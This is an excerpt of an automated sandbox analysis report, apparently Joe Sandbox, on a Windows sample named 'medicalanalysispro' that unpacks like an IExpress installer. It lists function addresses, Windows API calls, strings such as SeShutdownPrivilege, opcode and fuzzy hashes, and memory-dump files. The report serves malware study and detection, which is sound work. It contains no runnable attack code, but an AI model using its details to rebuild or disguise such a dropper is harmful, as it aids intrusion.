                                                                                                                                                                                                                                                                                                                • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                                                                                                                                                                                                                                                                • Instruction ID: b74df9183f509e814469fdf70e68a63faa7367f47c1b3f04b30c9a9c574e0c5e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40515932A08A82C6EB60AB21E840779A6A0FF44754FD40431DA4D86B9ADF7DF961C730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A60A4 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 75memoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A5078
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A5089
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50AF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: LoadResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50C0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: LockResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50CF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: memcpy_s.MSVCRT ref: 00007FF7600A50EE
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FreeResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50FD
                                                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7600A3123), ref: 00007FF7600A60C9
                                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00007FF7600A6142
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A4DCC: LoadStringA.USER32 ref: 00007FF7600A4E60
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A4DCC: MessageBoxA.USER32 ref: 00007FF7600A4EA0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A7700: GetLastError.KERNEL32 ref: 00007FF7600A7704
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                                                                                • String ID: $<None>$UPROMPT
                                                                                                                                                                                                                                                                                                                • API String ID: 957408736-2569542085
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                                                                                                                                                                                                                                                                • Instruction ID: 512b236293121cc024e675fdfaf647be61c726dd62d27b8e843b4623df455d29
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB316171A08642C7F720AB24E5507BAFA61EB85784F848135DA0E46F9BDF7DF0648B30
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A5380 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 164filestringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CreateFile$lstrcmp
                                                                                                                                                                                                                                                                                                                • String ID: *MEMCAB
                                                                                                                                                                                                                                                                                                                • API String ID: 1301100335-3211172518
                                                                                                                                                                                                                                                                                                                • Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                                                                                                                                                                                                                                                                • Instruction ID: 15993713d09b55aa165e28e738072db5bc23ea7388bd4cd5c8fd3a166cd08b3c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A961C566E08B41C6FB609B24A490379BA91FB45BA5F844331CA6E02BC9DF7CF5658730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A58B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152timeCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FileTime$AttributesDateItemLocalText
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                                                                                • API String ID: 851750970-1193786559
                                                                                                                                                                                                                                                                                                                • Opcode ID: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9199ec8922bcf428f2d7e60bf8957b66d0181ce290412cdd36528045288ea1fd
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB519236A18A42D1EB60AB11D4502BDA7A0FB48B92FC44231D94E57B9FDE3CF565C370
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A6B70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                • String ID: TMP4351$.TMP
                                                                                                                                                                                                                                                                                                                • API String ID: 3494564517-2619824408
                                                                                                                                                                                                                                                                                                                • Opcode ID: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                                                                                                                                                                                                                                                                                                • Instruction ID: 139b5b5d08b7924e352f604f5c1d5975dd35efd946c9fb80c4aef26fdba04ed8
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A316171A18641C7F710AB25A41037AF660EB85BB5F845334DA6E47FDACF3CE4658720
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A5690 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A3B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF7600A3A09), ref: 00007FF7600A3B64
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A3B40: PeekMessageA.USER32 ref: 00007FF7600A3B89
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A3B40: PeekMessageA.USER32 ref: 00007FF7600A3BCD
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE ref: 00007FF7600A56E4
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1084409-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2a76a806002c51afc5401a5001571f8213dae6f688e945ba72fdbdbea0bf890e
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2efc40693eff36cc330d81f6f4898726f7ab29a1a209d93e75f26ed29f9ec99d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a76a806002c51afc5401a5001571f8213dae6f688e945ba72fdbdbea0bf890e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B217C34A08542C6E710AB15E844779F7A0FB85B94F948235D96D06FAADF3DF425CB30
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A51BC Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2018477427-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
                                                                                                                                                                                                                                                                                                                • Instruction ID: 3ab5897ab5eb9f6d0b4173feaec69d08ae7f8c24d7cd460fd6652f19ef5550d5
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34115A35A0C642C2F6506B50A584375E6A0FB46759F988231D94D06FAECF7EF8A4C330
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A7BA8 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CharPrev
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 122130370-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                                                                                                                                                                                                                                                                • Instruction ID: c688b045c4d830963824e84471920bcf7423cd9902f5b74398494eab31ed8b00
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B701C451A0C6C1C6F7116B11A840369FA90A745BA0F989274DB6D0BBDFCB2CE4A28760
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A5770 Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                                                                                                                                                                                                                                                                • Instruction ID: bccb2f78d6dac9671214bb28250f415cf9b435fed6ea77c7a5d07613e0a1e178
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6F06D35608782D2EB185F25F68017CB6B0FB48B59F844239DA2B4AB89CF38E490C730

                                                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                                                Function 00007FF7600A3530 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 174windowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                                                                                                                                                                                                                                                                • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$ham
                                                                                                                                                                                                                                                                                                                • API String ID: 3530494346-2394228924
                                                                                                                                                                                                                                                                                                                • Opcode ID: db051c84840c0a1ce9bcce3cafedacda87a3346e9426d2c21970a37c6d42e784
                                                                                                                                                                                                                                                                                                                • Instruction ID: 8fb964cbabff82558c391ff1ea3651777e622a9de89f1801285c730c92f31665
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db051c84840c0a1ce9bcce3cafedacda87a3346e9426d2c21970a37c6d42e784
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B7154A1E0C642C6F760AB21A405779EA91FB89B94F948131DA4E06F9ECF3CB565C730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A11CC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                                                                                • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                                                                                                • Opcode ID: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                                                                                                                                                                                                                                                                                • Instruction ID: 3967398065f8c36012eaee7101f189552e999c948ecc3c3d6681bc37dca30dd6
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55312F36608B45CAD7109F16F4442AAFBA0FB89B90F855139DE4D43B19DF3DE055CB60
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A1C0C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64shutdownCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                                • API String ID: 2829607268-3733053543
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                                                                                                                                                                                                                                                                • Instruction ID: a6d5e24291e268420b9f9d45f8964d24cc179b35b08d7c5a4339d27312a9d4ff
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4521A072A18A42C7F750AB60E0557BAFBA0FB89745F809135DA4E06F59CF3CE054CB20
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A8964 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4104442557-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4f270b99c94daf7618a64b5e305b62bcdc3699ad7da27fd75f7737df50061c50
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF115E22B04B41CBEB00EF61E8446A873A4FB4D758F810A31EA6D47B59DF7CE5B58360
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A70A8 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
